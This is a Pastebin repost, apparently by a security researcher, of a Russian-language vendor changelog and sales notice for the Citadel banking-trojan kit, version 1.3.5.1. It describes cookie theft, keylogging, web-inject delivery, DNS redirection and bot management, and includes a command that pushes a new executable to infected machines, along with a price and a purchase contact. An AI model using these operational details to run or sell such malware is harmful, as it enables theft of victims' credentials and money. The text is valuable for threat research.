SHARE
TWEET

Update to Citadel : 1.3.5.1 Rain Edition - Original Adv

Kafeine Oct 3rd, 2012 782 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Самые современные средства и инструменты для профессиональной работы собраны специально для вас в новой версии.
  2. Решены проблемы с отстуком и живучестью, работа стала еще приятнее, учтены самые важные пожелания.
  3. Взят во внимание весь опыт работы за последний сезон, новичкам будет гораздо проще работать с новой версией, чем с предыдущими.
  4. Теперь открыта в свободном доступе новая технология WebInjects для всех желающих.
  5.  
  6. [+] Сделана быстрая проверка ботов на Online-статус, списком на главной странцие.
  7. [+] Возможность добавить бота в "Избранное" без отчетов.
  8. [+] Сделано детектирование привилегий в системе(admin/user), отображается в "Информация о боте: [Флаги]"
  9. [+] Сортировка скриншотов по дате.
  10. [+] Добавлена возможность подключения других БД Citadel (как удаленные БД, так и старые/отключенные админки) для поиска отчетов.
  11. [+] Расширен поиск в БД: можно указывать стоп-слова, например twitter.com, которые будут отсутствовать при выдаче результатов, чтобы не засорять логи мусором. Также, можно указать поиск не по содержимому отчета, а по URL Mask, это увеличивает скорость поиска данных.
  12. [+] Расширен Jabber уведомитель, добавлены следущие события:
  13. - Маски BotID на событие "Бот вышел в Online"
  14. - Уведомление при обнаружении конкретного ПО из "installed software"
  15. - Маска на содержимое CMD отчета.
  16. - Параллельная удобная запись в log-файл всех событий, помимо Jabber-уведомлений.
  17. [+] Добавлен бесплатный модуль граббинга кукисов в Firefox, экспортирует все cookies из браузера и отсылает вам.
  18. [+] Исправлена ошибка удаления отчетов.
  19. [+] Авто-обновление статистики главной страницы.
  20. [+] Кнопка [Decode] на отчетах, которая позволяет декодировать urlencode(%0D) последовательности в удобный вид.
  21. [+] Добавлена возможность определения online/offline статуса у бота в API.
  22. [+] Полностью переделан алгоритм проверки в модуле WebSocks.
  23. [+] Отображение скриптов(команд) постранично.
  24. [+] Добавлена возможность отсылки сообщений на jabber через api.php (использует ваши персональные настройки в админке)
  25. [+] Теперь при каждом HTTP/HTTPS отчете, добавляются cookies(Firefox/IE), а также заголовки:
  26. [+] Полностью переделан внутренний алгоритм шифрования, отстук во много раз выше, живучесть дольше. Для переноса ботов на новую версию, выполняем команду user_execute http://www.host.com/1351.exe. RC4 ключ должен совпадать.
  27. [+] Корректировка Browser Keylogger'a. Автоматически добавляются пробел, если с момента последнего нажатия клавиши прошло 5 секунд, необходимо для визуального разделения input-полей.
  28. [+] Исправлен недочет с 302 редиректом, когда не срабатывал инжект, если осуществлялся переход по ссылке через javascript.
  29. [+] Plaintext логи открываются в новой вкладке.
  30. [+] Исправлена ошибка пропадания ботов из онлайна при включенном GeoIP.
  31. [+] Отображение комментария к боту в VNC-модуле при наведении мышки, а также отсылка комментария в jabber вместе с информацией о коннекте.
  32. [+] Возможность указать в DnsFilters(перенаправление траффика) маски со звездочками (*), можно сделать маску более гибкой.
  33. [+] WebInjects. Модуль разработан для быстрого взаимодействия с холдером через технологию инжектов в браузеры. Модуль позволяет прогрузить любые инжекты конкретному BotID, стране или ботнету всего лишь за несколько минут, без редактирования конфига. Модуль работает через админку.
  34. Краткий ликбез:
  35. В конфиге бота, секция DynamicConfig, вписывается параметр url_webinjects "http://www.host.com/file.php" (путь до file.php). Бот дергает этот файл раз в 2 минуты, забирая оттуда пачку инжектов, которую выдает распределения система выдачи инжектов.
  36. В разделе ВебИнжекты существуют 2 секции: "Группа вебинжектов" и "Паки", первая имеет структуру "Группа - Инжекты - Пользователи(допущенные к группе)" и отвечает за управление всеми инжектами. Вторая секция отвечает за настройку распространения инжектов(каким ботам доставляем инжекты и в каком количестве).
  37. В главном меню, вразделе "Пользователи", при создании нового пользователя, есть права "r_botnet_webinjects_coder" это пользователь, который может управлять группой, привилегии которого назначит администратор. Иначе говоря, если вы допустите разработчика инжектов в админку и создадите ему аккаунт, то у него будут права создавать свои инжекты и редактировать их, чужие инжекты он не видит, отображается только своя группа списка инжектов. Т.е вы можете создать 5 групп и создать 5 инжект-кодеров, таким образом каждый человек отвечает за свою группу(набор инжектов). Вы смотрите в статистике что происходит в общей системе и можете объеденять все группы инжектов в один "пак", который будет прогружен всем без исключения ботам, либо отдельно взятой категории ботов по классу: страна или ботнет.
  38. В админке создан специальный удобный визуальный редактор инжектов с подсветкой синтаксиса. Формат полностью совместим с зевсоформатом.
  39. Сушествует несколько режимов для паков.
  40. Dual - когда работает файл с инжектами из основного конфига + вебинжекты.
  41. Single - когда работают только вебинжекты, а локальный файл с инжектами отключается.
  42. Disabled - когда вебинжекты отключены, а локальный файл с инжектами работает.
  43. Если случайно была допущена ошибка где-то в инжекте, то вебинжекты не соберутся и вам придет DEBUG-отчет с информацией, какой пак(bundle) не был собран.
  44. В информации по боту, можно посмотреть историю прогрузки веб-инжектов, также, можно поискать DEBUG-отчеты по боту и посмотреть историю компиляций и ошибок вебинжектов.
  45. Если бот получает сразу несколько паков(бандлов) где разные режимы работы: dual, single, disabled то из всех бандлов выбирается автоматически самый "узкий режим" работы, например single.
  46. Бот постоянно сверяет наличие обновления любого из вебинжектов, и если таковое имеется, то он его обновляет у себя.
  47. [+] Опция в конфиге disable_httpgrabber расширена и позволяет полностью избавиться от HTTP-отчетов, отправляя на сервер только HTTPS-отчеты со всех браузеров, если установлено значение "1". Избавьтесь от лишней нагрузки на сервер.
  48. [+] Добавлена секция "HttpVipUrls" в WebFilters, которая позволяет добавлять ссылки-исключения(http://) при отсутствии HTTP-граббинга (disable_httpgrabber 1).
  49. [+] Полностью перереботан мануал, теперь удобная навигация + раскрыты некоторые тонкости работы, а также добавлены ответы на популярные вопросы, с примерами. Изменено лицензионное соглашение, которое содержится в мануале.
  50.  
  51. Для получения новой версии, размещаем заявку в Jabber'e в таком формате: "<login в CRM> размещаю заявку на получение новой версии". Оплата поддержки должна быть своевременной, те, у кого задолжность более 3 месяцев - новую версию не получают. Срок выдачи от 3 до 72 часов. Если у вас имеется лицензированный партнер или саппорт, сразу пишите об этом в заявке до выдачи, а не после.
  52.  
  53. Для старых клиентов, обновление включено в абонентскую плату, для новых, цена базовой комплектации составляет теперь $3931.00
  54.  
  55. Jabber для покупки и обновлений: aquabox@lugmen.org.ar
  56. Саппорт в праве отказать в продаже лицензии без объяснения причины. Поддержка клиентов на уровне сложных технических вопросов отменена из-за большого количества, обменивайтесь опытом с коллегами через CRM либо форумы.
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top